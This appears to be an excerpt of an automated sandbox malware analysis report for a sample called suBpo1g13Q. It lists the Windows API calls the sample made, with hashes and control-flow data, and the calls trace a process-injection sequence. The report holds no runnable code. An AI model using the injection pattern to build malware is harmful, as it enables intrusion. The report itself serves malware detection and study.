• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071DDF8E
Memory Dump Source
• Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0

Control-flow Graph

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0296B17E
Memory Dump Source
• Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0

Control-flow Graph

APIs
• CreateActCtxA.KERNEL32(?), ref: 029659C9
Memory Dump Source
• Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

Control-flow Graph

APIs
• CreateActCtxA.KERNEL32(?), ref: 029659C9
Memory Dump Source
• Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

Control-flow Graph

APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071DDB60
Memory Dump Source
• Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0

Control-flow Graph

APIs
• DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,071B5D3D,?,?), ref: 071B5DEF
Memory Dump Source
• Source File: 00000000.00000002.1361991928.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_71b0000_suBpo1g13Q.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0

Control-flow Graph

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071DD9B6
Memory Dump Source
• Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0

                                                                                                                Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                • Basic blocks 71b47bc-71b5e22; the block at 71b5dc3-71b5dfc calls DrawTextExW
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,071B5D3D,?,?), ref: 071B5DEF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1361991928.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71b0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                • Opcode ID: 603ff1e898dccea9078c0f5fbf4e82e5d1ca9310c550751565205e4096d4d4a6
                                                                                                                • Instruction ID: df6a47b3b12c5135dff165ca74933684a86abb58983fed37c71f50fb3936852b
                                                                                                                • Opcode Fuzzy Hash: 603ff1e898dccea9078c0f5fbf4e82e5d1ca9310c550751565205e4096d4d4a6
                                                                                                                • Instruction Fuzzy Hash: 8131E2B59003499FDB10CF9AD884ADEFBF5FB48320F54842AE919A7250D375A954CFA0

                                                                                                                Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                • Basic blocks 71ddad0-71ddba6; the block at 71ddb2e-71ddb6d calls WriteProcessMemory
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071DDB60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 469bec383805bba3fe9a5fb36579f1bf4b051a284a13ef467bef3af07d8800b6
                                                                                                                • Instruction ID: 5ff506ca31c6a1cf837579233d3ba5792bf9c3d5fb1bfe0145075ec671b525ab
                                                                                                                • Opcode Fuzzy Hash: 469bec383805bba3fe9a5fb36579f1bf4b051a284a13ef467bef3af07d8800b6
                                                                                                                • Instruction Fuzzy Hash: CD2126B59003499FDB10CFAAC881BDEBBF5FF48310F10842AE958A7240C7799941CBA4

                                                                                                                Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                • Basic blocks 71ddbb8-71ddc86; the block at 71ddbb8-71ddc4d calls ReadProcessMemory
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071DDC40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: ecc0623da1bb6ad6297d812cc560168e914565870f550ec61590c012ec9d733b
                                                                                                                • Instruction ID: ff451fea18d4b34f940a3b543895660e04cbd546262c961bed4e0f06d438faee
                                                                                                                • Opcode Fuzzy Hash: ecc0623da1bb6ad6297d812cc560168e914565870f550ec61590c012ec9d733b
                                                                                                                • Instruction Fuzzy Hash: A42127B1D003499FDB20DFAAD841BDEBBF4FF48320F10842AE558A7240C779A941CBA4

                                                                                                                Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                • Basic blocks 296d808-296d8ca; the block at 296d810-296d8a4 calls DuplicateHandle
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0296D897
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 66f0e2de1d7eab0e13e39bc3e07083cd479ce346ddf03faeef43dd0a57db1482
                                                                                                                • Instruction ID: 1e2f35d3c9d2a75b6c3812eb7f1b66533a6f669d09cfc7681f2b447c6da4e61d
                                                                                                                • Opcode Fuzzy Hash: 66f0e2de1d7eab0e13e39bc3e07083cd479ce346ddf03faeef43dd0a57db1482
                                                                                                                • Instruction Fuzzy Hash: 5821D4B59003489FDB10CF9AD584AEEBBF8EB48310F14841AE954A3210D375A955CF65
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071DDC40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: b72fb43d3492950835254046ba9debe48b62f64c4f5f6b02442075dd28ba8d19
                                                                                                                • Instruction ID: 43de9a5fb02a148871685881f8c6407096cf08c8994efed676af8e0a15c63670
                                                                                                                • Opcode Fuzzy Hash: b72fb43d3492950835254046ba9debe48b62f64c4f5f6b02442075dd28ba8d19
                                                                                                                • Instruction Fuzzy Hash: B72105B1D003499FDB10CFAAC841BDEBBF5FF48320F10842AE958A7240C779A941CBA4

                                                                                                                Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                • Basic blocks 71dd938-71dd9fc; the block at 71dd993-71dd9c3 calls Wow64SetThreadContext
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071DD9B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: f098989d59f7d245cd85379b3bb1cd9bf226973f483d7a0702dcfeebb8d265e0
                                                                                                                • Instruction ID: 849ce11ac4d5e60565f6e5d0e5feadd0ac9addaa623c660cc37cec832a798220
                                                                                                                • Opcode Fuzzy Hash: f098989d59f7d245cd85379b3bb1cd9bf226973f483d7a0702dcfeebb8d265e0
                                                                                                                • Instruction Fuzzy Hash: CC2135B1D003098FDB24DFAAC4857EEBBF5EF48320F54842AD459A7280C779A945CFA0
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0296D897
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 0037b7804a4175b7a31db09facda165377536c7f047975a58dcbe1a61f3c0801
                                                                                                                • Instruction ID: cbf327a6c24c07a73fca17eff61c51c3bcf856ec212b197e8bbf25e78c98425f
                                                                                                                • Opcode Fuzzy Hash: 0037b7804a4175b7a31db09facda165377536c7f047975a58dcbe1a61f3c0801
                                                                                                                • Instruction Fuzzy Hash: A821C4B5D003489FDB10CF9AD584ADEFBF8EB48320F14841AE918A7350D375A955CFA5
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071DDA7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 1a2c3c0e70491dd9951bbcc5dceabb2f591c5750d3ce935d1ac4ad197934509d
                                                                                                                • Instruction ID: 15ece9bd7b884b4c68a05f491014e4430c25387df461a195b2172b83b25415b3
                                                                                                                • Opcode Fuzzy Hash: 1a2c3c0e70491dd9951bbcc5dceabb2f591c5750d3ce935d1ac4ad197934509d
                                                                                                                • Instruction Fuzzy Hash: F1116A769003099FDB20CFAAD845BDEBBF5EF48320F10841AE819A7250C7799941CFA0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 0d15e86f47ab5de398bfbde4187fea68b9b016a19e947c3c299d1fa5e6f2056c
                                                                                                                • Instruction ID: 2f8cd9e9d52e801e9e204ce8884371ee9e877f0cc3b71e15a34cf901d60577da
                                                                                                                • Opcode Fuzzy Hash: 0d15e86f47ab5de398bfbde4187fea68b9b016a19e947c3c299d1fa5e6f2056c
                                                                                                                • Instruction Fuzzy Hash: 531158B1D003488FDB20DFAAD4457EEFBF4EB48220F24841AD459A7640CB79A941CFA0
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071DDA7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 1456745849b425e6ec533e0faa89b7651612cbc17e9b129599790740f1d0c3ec
                                                                                                                • Instruction ID: 2b8b884b4597a96659a7d82f7836bf730e2e961a055cabca984c00dc82ce8d78
                                                                                                                • Opcode Fuzzy Hash: 1456745849b425e6ec533e0faa89b7651612cbc17e9b129599790740f1d0c3ec
                                                                                                                • Instruction Fuzzy Hash: 751137B59003499FDB20DFAAC845BDEBBF5EF48320F14841AE919A7250C779A941CFA4
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 125dc6468a97226bd956063e532846807b3ac91be41d13f9bef36c5a8d85d065
                                                                                                                • Instruction ID: eb2bbbdc290dee2d4b07b6a1a6043aa3bb1acdf015c29db6b6c34f83003e6f55
                                                                                                                • Opcode Fuzzy Hash: 125dc6468a97226bd956063e532846807b3ac91be41d13f9bef36c5a8d85d065
                                                                                                                • Instruction Fuzzy Hash: 9D1136B1D003488FDB20DFAAC4457DEFBF8EB88324F24842AD419A7640C779A941CFA4
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0296B17E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: fdc0ec9e7cd5fce31e4a74c5e565773fd9b3add3adcd3e24b5b15803df777df0
                                                                                                                • Opcode Fuzzy Hash: aa295cc453b20c124c291d272846fa9643aa5f1a8c9f172d4822ffdcd48711a3
                                                                                                                • Instruction Fuzzy Hash: 12513EB0E002198FDB14DFA9D5815AEFBF2BF89304F24816AD458A7356DB319D42CFA1

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:1.2%
                                                                                                                Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                Signature Coverage:8.1%
                                                                                                                Total number of Nodes:135
                                                                                                                Total number of Limit Nodes:11
                                                                                                                execution_graph 95381 430103 95382 430113 95381->95382 95383 430119 95381->95383 95386 42f143 95383->95386 95385 43013f 95389 42d2c3 95386->95389 95388 42f15b 95388->95385 95390 42d2e0 95389->95390 95391 42d2ee RtlAllocateHeap 95390->95391 95391->95388 95431 430233 95432 4301a3 95431->95432 95433 42f143 RtlAllocateHeap 95432->95433 95434 430200 95432->95434 95435 4301dd 95433->95435 95436 42f063 RtlFreeHeap 95435->95436 95436->95434 95392 425663 95393 42567c 95392->95393 95394 4256c7 95393->95394 95397 42570a 95393->95397 95399 42570f 95393->95399 95400 42f063 95394->95400 95398 42f063 RtlFreeHeap 95397->95398 95398->95399 95403 42d313 95400->95403 95402 4256d7 95404 42d32d 95403->95404 95405 42d33b RtlFreeHeap 95404->95405 95405->95402 95437 42c613 95438 42c630 95437->95438 95441 14e2df0 LdrInitializeThunk 95438->95441 95439 42c655 95441->95439 95442 4252d3 95443 4252ef 95442->95443 95444 425317 95443->95444 95445 42532b 95443->95445 95446 42cfc3 NtClose 95444->95446 95447 42cfc3 NtClose 95445->95447 95448 425320 95446->95448 95449 425334 95447->95449 95452 42f183 RtlAllocateHeap 95449->95452 95451 42533f 95452->95451 95406 414343 95409 42d233 95406->95409 95410 42d250 95409->95410 95413 14e2c70 LdrInitializeThunk 95410->95413 95411 414365 95413->95411 95414 4148a3 95415 4148bc 95414->95415 95420 418073 95415->95420 95417 4148da 95418 414926 95417->95418 95419 414913 PostThreadMessageW 95417->95419 95419->95418 95421 418097 95420->95421 95422 4180d3 LdrLoadDll 95421->95422 95423 41809e 95421->95423 95422->95423 95423->95417 95453 4196d3 95454 419703 95453->95454 95456 41972f 95454->95456 95457 41bb83 95454->95457 95458 41bbc7 95457->95458 95459 41bbe8 95458->95459 95460 42cfc3 NtClose 95458->95460 95459->95454 95460->95459 95461 401bb5 95463 401b96 95461->95463 95462 401bd6 95463->95462 95466 4305d3 95463->95466 95469 42ec13 95466->95469 95470 42ec39 
95469->95470 95481 407703 95470->95481 95472 42ec4f 95480 401ca8 95472->95480 95484 41b993 95472->95484 95474 42ec6e 95478 42ec83 95474->95478 95499 42d353 95474->95499 95477 42ec9d 95479 42d353 ExitProcess 95477->95479 95495 428ba3 95478->95495 95479->95480 95483 407710 95481->95483 95502 416d33 95481->95502 95483->95472 95485 41b9bf 95484->95485 95520 41b883 95485->95520 95488 41b9ec 95489 41b9f7 95488->95489 95492 42cfc3 NtClose 95488->95492 95489->95474 95490 41ba04 95491 41ba20 95490->95491 95493 42cfc3 NtClose 95490->95493 95491->95474 95492->95489 95494 41ba16 95493->95494 95494->95474 95496 428c05 95495->95496 95498 428c12 95496->95498 95531 418ed3 95496->95531 95498->95477 95500 42d36d 95499->95500 95501 42d37e ExitProcess 95500->95501 95501->95478 95503 416d50 95502->95503 95505 416d63 95503->95505 95506 42d9f3 95503->95506 95505->95483 95508 42da0d 95506->95508 95507 42da3c 95507->95505 95508->95507 95513 42c663 95508->95513 95511 42f063 RtlFreeHeap 95512 42dab2 95511->95512 95512->95505 95514 42c680 95513->95514 95517 14e2c0a 95514->95517 95515 42c6a9 95515->95511 95518 14e2c1f LdrInitializeThunk 95517->95518 95519 14e2c11 95517->95519 95518->95515 95519->95515 95521 41b89d 95520->95521 95525 41b979 95520->95525 95526 42c6f3 95521->95526 95524 42cfc3 NtClose 95524->95525 95525->95488 95525->95490 95527 42c710 95526->95527 95530 14e35c0 LdrInitializeThunk 95527->95530 95528 41b96d 95528->95524 95530->95528 95532 418efd 95531->95532 95538 41940b 95532->95538 95539 414523 95532->95539 95534 41902a 95535 42f063 RtlFreeHeap 95534->95535 95534->95538 95536 419042 95535->95536 95537 42d353 ExitProcess 95536->95537 95536->95538 95537->95538 95538->95498 95540 414543 95539->95540 95542 4145ac 95540->95542 95544 41bca3 RtlFreeHeap LdrInitializeThunk 95540->95544 95542->95534 95543 4145a2 95543->95534 95544->95543 95424 419628 95427 42cfc3 95424->95427 95426 419632 95428 42cfe0 95427->95428 95429 42cfee NtClose 95428->95429 95429->95426 95545 41497d 95546 414903 
95545->95546 95549 414983 95545->95549 95547 414926 95546->95547 95548 414913 PostThreadMessageW 95546->95548 95548->95547 95430 14e2b60 LdrInitializeThunk

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 193 418073-41808f 194 418097-41809c 193->194 195 418092 call 42fc43 193->195 196 4180a2-4180b0 call 430243 194->196 197 41809e-4180a1 194->197 195->194 200 4180c0-4180d1 call 42e6e3 196->200 201 4180b2-4180bd call 4304e3 196->201 206 4180d3-4180e7 LdrLoadDll 200->206 207 4180ea-4180ed 200->207 201->200 206->207
                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004180E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                • Instruction ID: cc92ade5e26e6fe28326d7d360432aee68fdf9963b73913c3c71af3ad9a56c06
                                                                                                                • Opcode Fuzzy Hash: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                • Instruction Fuzzy Hash: 950175B1E0010DA7DF10DBE1DC52FDEB7789B58304F0041AAE90897240F635EB48CB55

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 218 42cfc3-42cffc call 404a23 call 42e1d3 NtClose
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CFF7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 39452f28565ae4620622cddfb96962eeb8732a42bf1b94520a18f89472db538c
                                                                                                                • Instruction ID: 4c9b6845df2e633885d5ea462548a0d9519ba916f9f04643a3ab92386f56ff31
                                                                                                                • Opcode Fuzzy Hash: 39452f28565ae4620622cddfb96962eeb8732a42bf1b94520a18f89472db538c
                                                                                                                • Instruction Fuzzy Hash: 3CE086323402147BC620EA5AEC01F97B76CDFC5714F004429FE08A7142C674B91587F9

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 232 14e2b60-14e2b6c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 30848a622e99c84f414daa2abdf43356d95c5cef2d9e2658dcaec0dcbd28a54d
                                                                                                                • Instruction ID: a4175c3bf45c4cc275ece34eeff2e3884f887386091a8f3d066957cdcc2c2f79
                                                                                                                • Opcode Fuzzy Hash: 30848a622e99c84f414daa2abdf43356d95c5cef2d9e2658dcaec0dcbd28a54d
                                                                                                                • Instruction Fuzzy Hash: 6F90026160240103450571584414616400AD7F1201B55C026E20149A1DC735C9A56225

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 234 14e2df0-14e2dfc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 00ab63f9ef8e81966b746e13758ab361d59b5ba028144b38ce8ba2053dde1a37
                                                                                                                • Instruction ID: 3305dd07d73b873dc2e0dd5e19a4ddccff7a46ea07299f00a924cf8dcf54441f
                                                                                                                • Opcode Fuzzy Hash: 00ab63f9ef8e81966b746e13758ab361d59b5ba028144b38ce8ba2053dde1a37
                                                                                                                • Instruction Fuzzy Hash: 9390023160140513D511715845047070009D7E1241F95C417A1424969DD766CA66A221

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 233 14e2c70-14e2c7c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 68db07dc0413c28bfcd5d67128c8c44dc3fcf7565a39dcd86976cfc812391763
                                                                                                                • Instruction ID: ecd51ec0050181a322ee9f8916a87e5033f5175dd079c565bf67f57234276cb3
                                                                                                                • Opcode Fuzzy Hash: 68db07dc0413c28bfcd5d67128c8c44dc3fcf7565a39dcd86976cfc812391763
                                                                                                                • Instruction Fuzzy Hash: 9B90023160148902D5107158840474A0005D7E1301F59C416A5424A69DC7A5C9A57221

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 235 14e35c0-14e35cc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 1d76cb490cd479af85c2dc59b4abf1ef77b0aab7e5086bfc0fe5cb3614edc206
                                                                                                                • Instruction ID: dbc346b5496f0770e227035629f61bc7b46cf938a7504d01c6d0c8ef29ec9535
                                                                                                                • Opcode Fuzzy Hash: 1d76cb490cd479af85c2dc59b4abf1ef77b0aab7e5086bfc0fe5cb3614edc206
                                                                                                                • Instruction Fuzzy Hash: 80900231A0550502D500715845147061005D7E1201F65C416A1424979DC7A5CA6566A2

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 41497d-414981 1 414903-414911 0->1 2 414983-414990 0->2 3 414933-414938 1->3 4 414913-414924 PostThreadMessageW 1->4 5 414993-414996 2->5 4->3 6 414926-414930 4->6 7 4149b6-4149ba 5->7 8 414998-41499c 5->8 6->3 7->5 9 4149bc-4149c0 7->9 8->7 10 41499e-4149a2 8->10 10->7 11 4149a4-4149a8 10->11 11->7 12 4149aa-4149ae 11->12 12->7 13 4149b0-4149b4 12->13 13->7 14 4149c1-4149d1 13->14
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(FxK39HI69,00000111,00000000,00000000), ref: 00414920
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID: 9$FxK39HI69$FxK39HI69
                                                                                                                • API String ID: 1836367815-475315799
                                                                                                                • Opcode ID: 7b0ccf5fd3cf1d913e7caf8232417b232f1e2177184001fc3bf09bf45ff6c7a4
                                                                                                                • Instruction ID: 976b43b91f9a037b988bc6e8d6009723c8ac4a1273100eac61ec6f3c0456fa88
                                                                                                                • Opcode Fuzzy Hash: 7b0ccf5fd3cf1d913e7caf8232417b232f1e2177184001fc3bf09bf45ff6c7a4
                                                                                                                • Instruction Fuzzy Hash: A3012DB19592443CFF31D9706881FEBBB984B81304F0980DFD94C9B297D5569D8583CA

                                                                                                                Control-flow Graph

                                                                                                                • Executed
